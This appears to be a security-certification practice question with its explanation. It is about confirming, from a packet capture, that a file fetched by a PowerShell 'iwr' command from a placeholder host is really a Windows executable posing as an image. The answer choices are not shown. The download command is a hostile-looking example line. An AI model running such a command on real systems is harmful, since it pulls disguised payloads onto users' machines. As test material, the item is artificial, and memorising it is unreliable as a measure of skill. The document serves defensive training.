QuestionQ21

Security Operations

A security analyst is investigating an EDR alert and observes the following shell command:

PS > iwr -uri http://domain.com/happy.jpg -outfile .\important.url

The analyst can access only a network packet capture. Which action would most likely confirm whether the file is malicious?

Explanation

An MZ header identifies a Windows executable-format payload rather than the JPEG content implied by the download URL. Finding that executable magic value in the captured response indicates that an executable was delivered under a misleading filename or extension, a strong indicator of a malicious masquerading payload. Windows PE images begin with an MS-DOS-compatible executable header and contain a PE signature.

Learn more

Community Discussion

No comments yet. Be the first to start the discussion!